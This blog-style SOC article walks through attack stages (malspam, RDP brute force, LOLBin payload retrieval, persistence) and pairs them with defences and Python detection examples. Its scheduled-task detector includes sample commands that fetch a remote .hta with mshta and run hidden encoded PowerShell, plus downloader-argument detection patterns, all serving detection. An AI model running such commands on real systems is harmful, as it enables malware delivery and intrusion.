SOC First Defense phase – Understanding the Cyber Attack Chain – A Defense Approach with/without SOC
September 2, 2019


This article explains modern cyber threats and the attack surfaces most commonly used by malware and other cyber-attacks. In most cases, cyber attacks are executed in stages, so the SOC team must understand the attack patterns and the attack chain.

Breaking the attack chain and stopping the criminals before they reach their goal reduces the business impact of lost data. This article does not provide a complete set of defense steps or a blue-team guide for your organization.

It provides brief information on the attack vectors; every SOC team must build a defense mechanism against them as the initial stage of security monitoring.

These steps can also be followed by network security teams in small-scale industries or smaller firms that cannot afford a SOC; they help to build a first defense wall.

3 Major facts you need to keep in mind.

Cybercriminals always plan ahead of security controls.

1.) Don’t give everything to the attacker easily; make it harder for him to get it. (Control measures in the network)
2.) Don’t leave legitimate but abusable applications enabled if they are not in use; attackers routinely use legitimate applications already present in the network. (Abuse of LOLBins)
3.) Don’t assume attackers rely on a single piece of code; they work in attack stages with multiple commands and functionalities. (Cyber Kill Chains)

So the defense mechanisms you build must be based on your environment:

1.) Defending against malware delivery – entering your organization’s network.
2.) If malware is delivered successfully, how will you defend against its lateral movement and persistence? – moving inside your organization’s network.
3.) If the attacker accomplishes all his activities, his final stage is exfiltration or breach – leaving your organization’s network.

Fig: This is not the Cyber Kill Chain; it is the basic phases of an attack.

Let’s break down the stages and look at the defense mechanisms for each, to ensure security against common infection vectors.

Stage 1: Delivery of Malware/MalSpam

In every organization, firewalls/IPS and email gateways play a vital role in defending against malware delivery. But in recent times, these controls are easily defeated by cyber attackers.

Modern cyber attacks are not a single stage; malware is delivered to organizations in stages of infection. First, the attacker lures the victim into clicking a URL that looks harmless; it redirects to the C&C server, which drops the payloads. These stages cannot be blocked by traditional defense systems.

Two major ways:
1.) Email delivery – MalSpam, spear phishing, email campaigns
2.) RDP entry points

A.) Commonly used email attachments in most email campaigns:
1. .vbs (VBScript file)
2. .js (JavaScript file)
3. .exe (executable)
4. .jar (Java archive file)
5. .docx, .doc, .dot (Office documents)
6. .html, .htm (web page files)
7. .wsf (Windows script file)
8. .pdf (PDF document)
9. .xml (Excel file)
10. .rtf (rich text format file, used by Office)

Block unwanted and unauthorized email attachment extensions. Gmail blocks the following extensions, and they can be blocked in your organization too: .ade, .adp, .bat, .chm, .cmd, .com, .cpl, .dll, .dmg, .exe, .hta, .ins, .isp, .jar, .js, .jse, .lib, .lnk, .mde, .msc, .msi, .msp, .mst, .nsh, .pif, .scr, .sct, .shb, .sys, .vb, .vbe, .vbs, .vxd, .wsc, .wsf, .wsh

B.) Restrict employees from running scripts at the endpoint level.
C.) User awareness of spam emails and adequate training.
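A mail-gateway style attachment filter for the lists above, as an added example that is not code from the original article. It applies the block list to the final extension, routes the document formats listed under A.) to sandboxing rather than blocking them outright, and normalizes the tricks seen in malspam: upper-case extensions, trailing dots and spaces that Windows drops on save, and double extensions such as `Invoice.pdf.exe`. The verdict names (`block`, `review`, `allow`) and the sample filenames are constructed for the example.

```python
from typing import Tuple

# Block list reproduced from the article (the Gmail-style extension list).
BLOCKED_EXTENSIONS = {
    ".ade", ".adp", ".bat", ".chm", ".cmd", ".com", ".cpl", ".dll", ".dmg",
    ".exe", ".hta", ".ins", ".isp", ".jar", ".js", ".jse", ".lib", ".lnk",
    ".mde", ".msc", ".msi", ".msp", ".mst", ".nsh", ".pif", ".scr", ".sct",
    ".shb", ".sys", ".vb", ".vbe", ".vbs", ".vxd", ".wsc", ".wsf", ".wsh",
}

# Document formats the article lists as common malspam carriers. Business
# needs them, so they are routed to sandbox/review rather than blocked.
REVIEW_EXTENSIONS = {
    ".doc", ".docx", ".dot", ".rtf", ".html", ".htm", ".pdf", ".xml",
}


def classify_attachment(filename: str) -> Tuple[str, str]:
    """Return (verdict, reason); verdict is one of 'block', 'review', 'allow'.

    Normalization covers upper-case extensions, trailing dots/spaces (which
    Windows silently drops when the file is saved) and double extensions such
    as 'Invoice.pdf.exe' or 'Invoice.exe.pdf'.
    """
    name = filename.strip().rstrip(". ").lower()
    segments = name.split(".")
    if len(segments) < 2 or not segments[-1].strip():
        return "review", "no usable extension; file type cannot be determined"
    # Every dotted segment after the base name, with padding spaces removed,
    # so 'Invoice.pdf      .exe' is seen as ['.pdf', '.exe'].
    exts = ["." + seg.strip() for seg in segments[1:]]
    final = exts[-1]
    if final in BLOCKED_EXTENSIONS:
        return "block", "extension %s is on the block list" % final
    hidden = [e for e in exts[:-1] if e in BLOCKED_EXTENSIONS]
    if hidden:
        return "block", "blocked extension %s hidden inside the name (double-extension trick)" % hidden[0]
    if final in REVIEW_EXTENSIONS:
        return "review", "%s documents are a common malspam carrier; sandbox before delivery" % final
    return "allow", "extension %s is not on any list" % final


def message_verdict(attachments) -> str:
    """Worst verdict across all attachments of one message: a single blocked
    file is enough to quarantine the whole message."""
    order = {"allow": 0, "review": 1, "block": 2}
    worst = "allow"
    for fn in attachments:
        verdict, _ = classify_attachment(fn)
        if order[verdict] > order[worst]:
            worst = verdict
    return worst


if __name__ == "__main__":
    # Constructed sample filenames, not taken from any real campaign.
    samples = ["Invoice.PDF", "Invoice.pdf                 .exe", "Balance Sheet.exe.pdf",
               "Tender.docx", "logo.png", "README", "setup.scr ."]
    for fn in samples:
        print("%-40r -> %s (%s)" % (fn, *classify_attachment(fn)))
```

Files with no extension are sent to review rather than allowed, because the gateway cannot tell what they are; a real deployment would add content-type sniffing behind this name-based check.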

RDP – Remote Desktop Protocol (port 3389). Identifying servers with vulnerable RDP connections (port 3389 is the default) has been made incredibly easy by scanning tools like Shodan and masscan.

From there, it’s simply a matter of applying brute-forcing tools like NLBrute to crack the RDP account credentials, and attackers are in. Alternatively, if attackers are feeling especially lazy, they can simply head over to the underground dark market xDedic, where RDP access to a compromised server can cost as little as $6.

RDP has become a favorite infection vector for ransomware criminals, in particular, with the actors behind SamSam, CrySiS, LockCrypt, Shade, Apocalypse, and other variants all getting in on the act.

Defense Mechanism of RDP Abuse:
o Restrict access via firewalls
o Use strong passwords and 2FA/MFA
o Limit users who can log in using RDP
o Set an account lockout policy to counter brute-force attacks.
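The lockout policy above stops the guessing; the SOC still needs to see it happening. Below is detection logic for RDP brute force and password spraying over Windows Security logon-failure events (ID 4625), added here as an example and not code from the original article. The event rows, IP addresses and account names are constructed, and the thresholds (five failures within five minutes, three distinct accounts to call it a spray) are assumed tuning values to adjust per environment. It also checks whether a successful logon (ID 4624) from the same source followed the burst, which is the case that must page someone.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Tuning values are assumptions for illustration; adjust to your environment.
FAIL_THRESHOLD = 5                 # failed logons from one source inside WINDOW
WINDOW = timedelta(minutes=5)
SPRAY_MIN_ACCOUNTS = 3             # distinct accounts tried from one source
# 4625 LogonType 10 = RemoteInteractive (classic RDP); when Network Level
# Authentication is enabled, failed RDP logons are recorded as LogonType 3.
RDP_LOGON_TYPES = {"10", "3"}

# Constructed sample of Security events: (TimeCreated, EventID, IpAddress,
# TargetUserName, LogonType). Not real telemetry.
SAMPLE_EVENTS = [
    # six failures against one account from 203.0.113.7, then a successful RDP logon
    ("2019-09-02T01:00:05", 4625, "203.0.113.7", "administrator", "10"),
    ("2019-09-02T01:00:11", 4625, "203.0.113.7", "administrator", "10"),
    ("2019-09-02T01:00:18", 4625, "203.0.113.7", "administrator", "10"),
    ("2019-09-02T01:00:26", 4625, "203.0.113.7", "administrator", "10"),
    ("2019-09-02T01:00:33", 4625, "203.0.113.7", "administrator", "10"),
    ("2019-09-02T01:00:41", 4625, "203.0.113.7", "administrator", "10"),
    ("2019-09-02T01:00:55", 4624, "203.0.113.7", "administrator", "10"),
    # one attempt per account from 198.51.100.9 (spray pattern, logged as type 3 by NLA)
    ("2019-09-02T01:02:00", 4625, "198.51.100.9", "jsmith", "3"),
    ("2019-09-02T01:02:04", 4625, "198.51.100.9", "akumar", "3"),
    ("2019-09-02T01:02:09", 4625, "198.51.100.9", "mlee", "3"),
    ("2019-09-02T01:02:13", 4625, "198.51.100.9", "svc_backup", "3"),
    ("2019-09-02T01:02:18", 4625, "198.51.100.9", "helpdesk", "3"),
    # a user mistyping a password twice at the console (LogonType 2): benign
    ("2019-09-02T01:05:00", 4625, "127.0.0.1", "rgarcia", "2"),
    ("2019-09-02T01:05:07", 4625, "127.0.0.1", "rgarcia", "2"),
]


def load(rows) -> List[Dict]:
    """Turn the flat rows into event dicts with parsed timestamps."""
    return [{"time": datetime.fromisoformat(t), "id": eid, "ip": ip, "user": u, "type": lt}
            for t, eid, ip, u, lt in rows]


def detect_rdp_bruteforce(events: List[Dict]) -> List[Dict]:
    """One finding per source IP whose RDP failures exceed FAIL_THRESHOLD
    inside any WINDOW-long sliding window."""
    failures = defaultdict(list)
    for e in events:
        if e["id"] == 4625 and e["type"] in RDP_LOGON_TYPES:
            failures[e["ip"]].append(e)

    findings = []
    for ip, fails in failures.items():
        fails.sort(key=lambda e: e["time"])
        best: List[Dict] = []
        start = 0
        for end in range(len(fails)):
            # Advance the window start until the span fits inside WINDOW.
            while fails[end]["time"] - fails[start]["time"] > WINDOW:
                start += 1
            size = end - start + 1
            if size >= FAIL_THRESHOLD and size > len(best):
                best = fails[start:end + 1]
        if not best:
            continue
        users = sorted({f["user"] for f in best})
        kind = "password_spray" if len(users) >= SPRAY_MIN_ACCOUNTS else "brute_force"
        # A 4624 from the same source at or after the burst means a guess worked.
        success_after = any(e["id"] == 4624 and e["ip"] == ip and e["time"] >= best[-1]["time"]
                            for e in events)
        findings.append({"ip": ip, "kind": kind, "failures": len(best), "accounts": users,
                         "first": best[0]["time"], "last": best[-1]["time"],
                         "success_after": success_after})
    return findings


if __name__ == "__main__":
    for f in detect_rdp_bruteforce(load(SAMPLE_EVENTS)):
        print("%(ip)s: %(kind)s, %(failures)d failures against %(accounts)s, "
              "success afterwards: %(success_after)s" % f)
```

Console failures (LogonType 2) are excluded on purpose so that a user fumbling a password does not produce an RDP alert; the same filter is what keeps the rule quiet on a busy domain controller.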

Stage 1A: Retrieval of payloads from command & control servers

In recent campaigns, email is the most viable option for cyber attackers to lure the victim into clicking malicious links with attractive words or images. In some scenarios the email is only the first stage: it lures the victim into running a script from the email, which abuses the user’s applications to download the payloads for the second stage of infection. Disabling or restricting those legitimate resources from downloading files from the Internet can help prevent payload retrieval.

Cyber attackers love to abuse legitimate Microsoft Office applications to accomplish their goals, because:
1.) Office applications are universally accepted. Most attachment names used by attackers in an email reflect that (Invoice, Spreadsheet, Reports, Balance Sheets, Documents, Tenders).
2.) Office apps are easy to weaponize. Microsoft’s built-in capabilities attract attackers, who use them in many ways.

How do attackers abuse Microsoft applications to retrieve payloads?

A.) Macros – Disable or restrict
B.) Object Linking and Embedding (OLE) – Disable or restrict
C.) Dynamic Data Exchange (DDE) – functionality removed from Word; still needs to be disabled in Excel and Outlook
D.) Exploiting Equation Editor – CVE-2017-11882 – Functionality removed in January 2018 Windows Security Update

Not only Microsoft Office applications: attackers also use other legitimate applications and Windows built-in tools to retrieve payloads.

A.) VBScript and JavaScript – disable them if not needed
B.) PowerShell – disable it, or reduce its capabilities using AppLocker or Windows Software Restriction Policy (SRP).
C.) Abuse of certutil.exe, mshta.exe, regsvr32.exe, bitsadmin.exe and curl.exe – block the applications, or block them from making outbound requests.

Legitimate applications: the following can be used to circumvent application whitelisting; either blocking them or keeping them under monitoring is recommended.

Stage 2: Ensure the malware is not executed and does not spread across the organization

Traditionally, organizations have relied on antivirus (AV) software to prevent malware from running.

Attacks have evolved to bypass or evade AV. To be effective, endpoint protection software should use machine learning for smarter file analysis and real-time system activity analysis designed to detect and block malicious behaviors.

Application whitelisting is another good layer but can be difficult to maintain. Attackers can also bypass whitelisting and many AV/NGAV solutions by injecting malicious code into the memory space of a legitimate process, thereby hijacking its privileges and executing under its guise.

There are a variety of injection techniques attackers can use: DLL injection, reflective DLL injection, process hollowing, process doppelgänging, AtomBombing, etc.

Defenses against malware execution in your environment are:

1.) Endpoint protection.
2.) Application whitelisting.
3.) If possible, disable or restrict users from running scripts.
4.) Windows control over folders (Controlled Folder Access).
5.) To prevent injection techniques, monitor processes and API calls.

Stage 3: Ensure your data isn’t exfiltrated or breached at/after the final stage of the attack chain

Once attackers have initial access, their attention turns to post-exploitation activities. To continue operating under the radar, attackers prefer “living off the land,” using legitimate tools and processes already present on the system. One of the first goals of post-exploitation is typically privilege escalation, the process of gaining additional rights and access, in order to achieve persistence.

Attackers can abuse system tools and functionality to create various load points, including storing scripts in the registry.

A growing number of malware variants are designed to propagate automatically, often by abusing remote administration tools.

Living off the land is the strategy of abusing legitimate programs and built-in functionality to carry out malicious activities without raising red flags. Some of the most commonly abused tools are PowerShell, Windows Management Instrumentation (WMI), and remote administration tools like PsExec.

Attacker Techniques and Defense Mechanisms:

1.) Abusing programs designed to auto-elevate
a.) Use highest UAC enforcement level whenever possible.
b.) Enable Admin Approval Mode.
c.) Remove users from local admin group.
2.) DLL hijacking
a.) Endpoint protection software.
b.) Disallow loading of remote DLLs.
c.) Enable Safe DLL Search Mode.

3.) Privilege escalation exploits (token stealing, exploiting NULL pointer dereference vulnerabilities, setting security descriptors to NULL, etc.)
a.) Endpoint protection software with user space, kernel space, and CPU-level visibility.
4.) Dumping credentials
a.) Disable credential caching.
b.) Disable or restrict PowerShell with AppLocker.
c.) Practice the least privilege, avoid credential overlap.
d.) Endpoint protection software that protects LSASS and other credential stores
5.) Lateral movement techniques (abusing remote administration tools, etc.)
a.) UAC settings recommendations.
b.) Network segmentation best practices (ref: SANS)
c.) Two-factor authentication (2FA).
6.) Hiding malicious scripts in the registry
a.) Monitor with Autoruns.
7.) Creating malicious scheduled tasks
a.) Monitor for Windows Security Log Event ID 4698.
8.) Abusing WMI to trigger script execution based on events (at startup, etc.)
a.) Create defensive WMI event subscriptions.
b.) When possible, set a fixed port for remote WMI and block it.
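Monitoring Event ID 4698 (item 7 above) is only useful if the analyst can see what the new task actually runs, and the binaries listed under Stage 1A (certutil.exe, mshta.exe, regsvr32.exe, bitsadmin.exe, curl.exe, PowerShell) are exactly what a malicious task tends to call. The parser below, an added example that is not code from the original article, takes a 4698 event in the XML shape Windows writes (the task definition travels escaped inside the `TaskContent` field), extracts each `Exec` action and flags living-off-the-land binaries and downloader-style arguments. The sample events, user names, task names and the argument patterns are constructed for the example; the two XML namespaces are the real ones used by Windows events and by Task Scheduler definitions.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple
from xml.sax.saxutils import escape

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Binaries the article names as abused to retrieve payloads, plus the script
# hosts that run the .vbs/.js attachments it lists.
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "bitsadmin.exe",
           "curl.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Argument patterns that turn a benign tool into a downloader or loader
# (constructed for this example, not an exhaustive list).
SUSPICIOUS_ARGS = [
    (r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", "encoded PowerShell command"),
    (r"https?://", "URL in task arguments (remote payload retrieval)"),
    (r"-urlcache", "certutil download switch"),
    (r"/transfer\b", "bitsadmin transfer job"),
    (r"scrobj\.dll|/i:", "regsvr32 scriptlet loading"),
]


def make_4698_event(user: str, task_name: str, command: str, arguments: str) -> str:
    """Build a constructed Security event 4698 in the shape Windows writes it:
    the task definition XML is carried, escaped, in the TaskContent field."""
    task_xml = (
        '<?xml version="1.0" encoding="UTF-16"?>'
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        "<Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>"
        '<Actions Context="Author"><Exec><Command>%s</Command><Arguments>%s</Arguments></Exec></Actions>'
        "</Task>" % (escape(command), escape(arguments))
    )
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        '<System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4698</EventID>'
        "<Computer>WS01.example.local</Computer></System>"
        '<EventData><Data Name="SubjectUserName">%s</Data><Data Name="TaskName">%s</Data>'
        '<Data Name="TaskContent">%s</Data></EventData></Event>'
        % (escape(user), escape(task_name), escape(task_xml))
    )


def parse_4698(event_xml: str) -> Dict:
    """Extract creator, task name and every (command, arguments) action."""
    root = ET.fromstring(event_xml)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", EVT_NS)}
    # The embedded task XML declares encoding="UTF-16" even though we now hold
    # it as text; drop the declaration so the parser does not trip on it.
    task_xml = re.sub(r"^<\?xml[^>]*\?>", "", data.get("TaskContent", "").strip())
    actions: List[Tuple[str, str]] = []
    for ex in ET.fromstring(task_xml).findall("t:Actions/t:Exec", TASK_NS):
        cmd = ex.findtext("t:Command", default="", namespaces=TASK_NS)
        args = ex.findtext("t:Arguments", default="", namespaces=TASK_NS)
        actions.append((cmd.strip(), args.strip()))
    return {"user": data.get("SubjectUserName", ""), "task": data.get("TaskName", ""),
            "actions": actions}


def assess(parsed: Dict) -> Dict:
    """Attach triage reasons: LOLBin as the command, or downloader-style arguments."""
    reasons = []
    for cmd, args in parsed["actions"]:
        exe = cmd.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if exe in LOLBINS:
            reasons.append("%s is a living-off-the-land binary" % exe)
        for pattern, why in SUSPICIOUS_ARGS:
            if re.search(pattern, args, re.IGNORECASE):
                reasons.append(why)
    return dict(parsed, reasons=reasons, suspicious=bool(reasons))


SAMPLE_EVENTS = [  # constructed, not real telemetry
    make_4698_event("jsmith", r"\Microsoft\Windows\UpdateCheck",
                    r"C:\Windows\System32\mshta.exe", "http://203.0.113.10/u.hta"),
    make_4698_event("backupsvc", r"\NightlyBackup",
                    r"C:\Program Files\BackupTool\backup.exe", "--full --quiet"),
    make_4698_event("jsmith", r"\SystemHealthCheck",
                    "powershell.exe", "-nop -w hidden -enc JABjAG0AZAA9ACIAeAAiAA=="),
]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        r = assess(parse_4698(event))
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print("%s  %s by %s -> %s %s" % (flag, r["task"], r["user"], r["actions"], r["reasons"]))
```

The task name in the first sample sits under `\Microsoft\Windows\`, which is why the rule keys on the command and arguments rather than on the name: a malicious task is named to look like a built-in one, but it still has to call something to fetch or run its payload.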


This covers the basic understanding of the threat vectors and attack surfaces we might encounter in our organization, and how to build a defense wall at a basic level.

This will not make you 100% safe against all threats; new and unique techniques keep emerging, and more correlations between malware patterns keep arising. But we must ensure that we are already safe against the known patterns of cyber attacks, based on the above recommendations.

Remember, “When defenders learn, offenders evolve”.

This post SOC First Defense phase – Understanding the Cyber Attack Chain – A Defense Approach with/without SOC originally appeared on GB Hackers.
